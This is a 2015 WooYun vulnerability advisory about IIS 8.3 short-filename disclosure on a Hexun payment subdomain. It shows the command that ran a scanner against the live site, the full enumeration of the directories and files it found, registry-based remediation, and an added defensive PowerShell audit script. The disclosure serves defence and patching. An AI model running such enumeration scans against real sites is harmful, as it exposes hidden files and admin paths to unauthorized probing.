
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0115841

Title: Short filename vulnerability on a Hexun (和讯网) site

Vendor: Hexun (和讯网)

Author: 0c0c0f

Submitted: 2015-05-25 16:41

Fixed: 2015-07-09 16:44

Disclosed: 2015-07-09 16:44

Type: System/service patches not applied in time

Severity: Low

Self-assessed Rank: 2

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-25: Details sent to the vendor, awaiting vendor handling
2015-05-25: Vendor confirmed; details visible to the vendor only
2015-06-04: Details disclosed to core white hats and relevant domain experts
2015-06-14: Details disclosed to regular white hats
2015-06-24: Details disclosed to intern white hats
2015-07-09: Details disclosed to the public

Brief description:

Why this vulnerability matters:
Guessing the backend (admin) path.
Guessing sensitive files, such as backup .rar, .zip, .bak or .sql files.
In some cases the corresponding file can even be downloaded directly over the web through its short name, for example a backup SQL file.

Detailed description:

The following domain has the IIS short filename vulnerability:
http://mpay.hexun.com/
Proof as follows:
[root@pentest IIS_shortname_Scanner]# python iis_shortname_Scan.py http://mpay.hexun.com/
server is vulerable, please wait, scanning...
Found /i**** [scan in progress]
Found /a**** [scan in progress]
Found /c**** [scan in progress]
Found /e**** [scan in progress]
Found /m**** [scan in progress]
Found /k**** [scan in progress]
Found /p**** [scan in progress]
Found /n**** [scan in progress]
Found /r**** [scan in progress]
Found /s**** [scan in progress]
Found /t**** [scan in progress]
Found /u**** [scan in progress]
Found /w**** [scan in progress]
Found /z**** [scan in progress]
Found /in**** [scan in progress]
Found /as**** [scan in progress]
Found /ce**** [scan in progress]
Found /ex**** [scan in progress]
Found /me**** [scan in progress]
Found /mo**** [scan in progress]
Found /kq**** [scan in progress]
Found /pa**** [scan in progress]
Found /po**** [scan in progress]
Found /pr**** [scan in progress]
Found /no**** [scan in progress]
Found /re**** [scan in progress]
Found /sh**** [scan in progress]
Found /st**** [scan in progress]
Found /su**** [scan in progress]
Found /sz**** [scan in progress]
Found /te**** [scan in progress]
Found /um**** [scan in progress]
Found /we**** [scan in progress]
Found /zf**** [scan in progress]
Found /inq**** [scan in progress]
Found /int**** [scan in progress]
Found /asp**** [scan in progress]
Found /cer**** [scan in progress]
Found /exc**** [scan in progress]
Found /mes**** [scan in progress]
Found /mer**** [scan in progress]
Found /mon**** [scan in progress]
Found /kqt**** [scan in progress]
Found /pay**** [scan in progress]
Found /pos**** [scan in progress]
Found /pre**** [scan in progress]
Found /not**** [scan in progress]
Found /rem**** [scan in progress]
Found /she**** [scan in progress]
Found /sta**** [scan in progress]
Found /suc**** [scan in progress]
Found /szf**** [scan in progress]
Found /tes**** [scan in progress]
Found /ump**** [scan in progress]
Found /web**** [scan in progress]
Found /zfb**** [scan in progress]
Found /inqu**** [scan in progress]
Found /inte**** [scan in progress]
Found /aspn**** [scan in progress]
Found /cert**** [scan in progress]
Found /exce**** [scan in progress]
Found /mess**** [scan in progress]
Found /merc**** [scan in progress]
Found /mone**** [scan in progress]
Found /kqto**** [scan in progress]
Found /payt**** [scan in progress]
Found /post**** [scan in progress]
Found /prec**** [scan in progress]
Found /noti**** [scan in progress]
Found /remi**** [scan in progress]
Found /shen**** [scan in progress]
Found /star**** [scan in progress]
Found /succ**** [scan in progress]
Found /szft**** [scan in progress]
Found /szf_**** [scan in progress]
Found /test**** [scan in progress]
Found /umpa**** [scan in progress]
Found /zfbt**** [scan in progress]
Found /inqui**** [scan in progress]
Found /inter**** [scan in progress]
Found /aspne**** [scan in progress]
Found /certi**** [scan in progress]
Found /excel**** [scan in progress]
Found /messa**** [scan in progress]
Found /merch**** [scan in progress]
Found /money**** [scan in progress]
Found /kqtoh**** [scan in progress]
Found /payto**** [scan in progress]
Found /post_**** [scan in progress]
Found /preco**** [scan in progress]
Found /notif**** [scan in progress]
Found /remit**** [scan in progress]
Found /shenz**** [scan in progress]
Found /start**** [scan in progress]
Found /succe**** [scan in progress]
Found /szfto**** [scan in progress]
Found /szf_s**** [scan in progress]
Found /test2**** [scan in progress]
Found /umpay**** [scan in progress]
Found /zfbto**** [scan in progress]
Found /inquir**** [scan in progress]
Found /interf**** [scan in progress]
Found /aspnet**** [scan in progress]
Found /certif**** [scan in progress]
Found /excelf**** [scan in progress]
Found /messag**** [scan in progress]
Found /merchb**** [scan in progress]
Found /moneyo**** [scan in progress]
Found /kqtohx**** [scan in progress]
Found /post_r**** [scan in progress]
Found /precom**** [scan in progress]
Found /notify**** [scan in progress]
Found /remiti**** [scan in progress]
Found /shenzh**** [scan in progress]
Found /startp**** [scan in progress]
Found /succes**** [scan in progress]
Found /szftoh**** [scan in progress]
Found /szf_su**** [scan in progress]
Found /umpay_**** [scan in progress]
Found /zfbtoh**** [scan in progress]
Found /inquir*a** [scan in progress]
Found /inquir*p** [scan in progress]
Found /inquir*s** [scan in progress]
Found /interf [scan in progress]
Found Dir /interf~1 [Done]
Found /aspnet [scan in progress]
Found Dir /aspnet~1 [Done]
Found /certif [scan in progress]
Found Dir /certif~1 [Done]
Found /excelf [scan in progress]
Found Dir /excelf~1 [Done]
Found /messag*h** [scan in progress]
Found /messag*m** [scan in progress]
Found /messag*t** [scan in progress]
Found /merchb [scan in progress]
Found Dir /merchb~1 [Done]
Found /moneyo [scan in progress]
Found Dir /moneyo~1 [Done]
Found /kqtohx*a** [scan in progress]
Found /kqtohx*p** [scan in progress]
Found /kqtohx*s** [scan in progress]
Found /post_r*a** [scan in progress]
Found /post_r*p** [scan in progress]
Found /post_r*s** [scan in progress]
Found /precom*c** [scan in progress]
Found /precom*n** [scan in progress]
Found /precom*o** [scan in progress]
Found /notify*a** [scan in progress]
Found /notify*p** [scan in progress]
Found /notify*s** [scan in progress]
Found /remiti*a** [scan in progress]
Found /remiti*p** [scan in progress]
Found /remiti*s** [scan in progress]
Found /startp*a** [scan in progress]
Found /shenzh [scan in progress]
Found Dir /shenzh~1 [Done]
Found /startp*s** [scan in progress]
Found /startp*p** [scan in progress]
Found /succes*a** [scan in progress]
Found /succes*h** [scan in progress]
Found /succes*m** [scan in progress]
Found /succes*p** [scan in progress]
Found /succes*t** [scan in progress]
Found /succes*s** [scan in progress]
Found /szftoh*a** [scan in progress]
Found /szftoh*p** [scan in progress]
Found /szftoh*s** [scan in progress]
Found /szf_su*a** [scan in progress]
Found /szf_su*p** [scan in progress]
Found /szf_su*s** [scan in progress]
Found /umpay_*a** [scan in progress]
Found /umpay_*p** [scan in progress]
Found /umpay_*s** [scan in progress]
Found /zfbtoh*a** [scan in progress]
Found /zfbtoh*p** [scan in progress]
Found /zfbtoh*s** [scan in progress]
Found /inquir*as* [scan in progress]
Found /inquir*sp* [scan in progress]
Found /messag*ht* [scan in progress]
Found /messag*tm* [scan in progress]
Found /kqtohx*as* [scan in progress]
Found /kqtohx*sp* [scan in progress]
Found /post_r*as* [scan in progress]
Found /post_r*sp* [scan in progress]
Found /precom*co* [scan in progress]
Found /precom*on* [scan in progress]
Found /notify*as* [scan in progress]
Found /notify*sp* [scan in progress]
Found /remiti*as* [scan in progress]
Found /remiti*sp* [scan in progress]
Found /startp*as* [scan in progress]
Found /startp*sp* [scan in progress]
Found /succes*as* [scan in progress]
Found /succes*ht* [scan in progress]
Found /succes*tm* [scan in progress]
Found /succes*sp* [scan in progress]
Found /szftoh*as* [scan in progress]
Found /szftoh*sp* [scan in progress]
Found /szf_su*as* [scan in progress]
Found /szf_su*sp* [scan in progress]
Found /umpay_*as* [scan in progress]
Found /umpay_*sp* [scan in progress]
Found /zfbtoh*as* [scan in progress]
Found /zfbtoh*sp* [scan in progress]
Found /inquir*asp [scan in progress]
Found File /inquir~1.asp [Done]
Found /messag*htm [scan in progress]
Found File /messag~1.htm [Done]
Found /kqtohx*asp [scan in progress]
Found File /kqtohx~1.asp [Done]
Found /post_r*asp [scan in progress]
Found File /post_r~1.asp [Done]
Found /precom*con [scan in progress]
Found File /precom~1.con [Done]
Found /notify*asp [scan in progress]
Found File /notify~1.asp [Done]
Found /remiti*asp [scan in progress]
Found File /remiti~1.asp [Done]
Found /startp*asp [scan in progress]
Found File /startp~1.asp [Done]
Found /succes*asp [scan in progress]
Found File /succes~1.asp [Done]
Found /succes*htm [scan in progress]
Found File /succes~1.htm [Done]
Found /szftoh*asp [scan in progress]
Found File /szftoh~1.asp [Done]
Found /szf_su*asp [scan in progress]
Found File /szf_su~1.asp [Done]
Found /umpay_*asp [scan in progress]
Found File /umpay_~1.asp [Done]
Found /zfbtoh*asp [scan in progress]
Found File /zfbtoh~1.asp [Done]
----------------------------------------------------------------
Dir: /interf~1
Dir: /aspnet~1
Dir: /certif~1
Dir: /excelf~1
Dir: /merchb~1
Dir: /moneyo~1
Dir: /shenzh~1
File: /inquir~1.asp
File: /messag~1.htm
File: /kqtohx~1.asp
File: /post_r~1.asp
File: /precom~1.con
File: /notify~1.asp
File: /remiti~1.asp
File: /startp~1.asp
File: /succes~1.asp
File: /succes~1.htm
File: /szftoh~1.asp
File: /szf_su~1.asp
File: /umpay_~1.asp
File: /zfbtoh~1.asp
----------------------------------------------------------------
7 Directories, 14 Files found in toal

Proof of vulnerability:

Proof: the same scanner output shown under Detailed description above.

Fix:

1) Upgrade the .NET Framework
2) Change the registry value:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
Set NtfsDisable8dot3NameCreation to 1.
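An added example (not part of the original report) for verifying step 2 on the server side: it reads the registry value named above and then lists any short names already present under the web root, because disabling creation does not remove 8.3 names that existed before the change. The web root path is an assumption.

```powershell
# Added example, not from the original report. Audits the fix above on an IIS host.
# Assumption: the site's web root is the default path below; change it to match.
$WebRoot = 'C:\inetpub\wwwroot'

# Step 2 of the fix: read NtfsDisable8dot3NameCreation from the FileSystem key.
#   0 = short (8.3) names are created on every volume
#   1 = creation disabled on every volume (the value the fix requires)
#   2 = decided per volume, 3 = disabled everywhere except the system volume
$Key = 'HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem'
$Value = (Get-ItemProperty -Path $Key -Name NtfsDisable8dot3NameCreation).NtfsDisable8dot3NameCreation
if ($Value -eq 1) {
    Write-Output "NtfsDisable8dot3NameCreation = 1: no new 8.3 names will be generated."
} else {
    Write-Output "NtfsDisable8dot3NameCreation = $Value: 8.3 name generation still enabled; the fix expects 1."
}

# Caveat: the registry value only stops NEW short names. Files and directories
# that already had one (e.g. INQUIR~1.ASP) keep it and remain guessable.
# 'dir /x' prints the 8.3 name beside the long name whenever the two differ.
$ShortNames = cmd /c "dir /x /s `"$WebRoot`"" |
    Select-String -Pattern '\s(\S{1,6}~\d+(\.\S{1,3})?)\s' |
    ForEach-Object { $_.Matches[0].Groups[1].Value }

if ($ShortNames) {
    Write-Output "Existing short names under ${WebRoot}:"
    $ShortNames | Sort-Object -Unique
    # Remove them once creation is disabled: dry run first (/t), then for real.
    #   fsutil 8dot3name strip /t /s /v $WebRoot
    #   fsutil 8dot3name strip /s /v $WebRoot
    # Review the strip output for registry entries that store the short path.
} else {
    Write-Output "No 8.3 names found under $WebRoot."
}
```

Run it in an elevated PowerShell session; reading the key works unprivileged, but the fsutil strip step needs administrator rights.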

Copyright notice: when reposting, please credit the source 0c0c0f@WooYun


Vulnerability response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2015-05-25 16:42

Vendor reply:

In progress

Latest status:

None yet

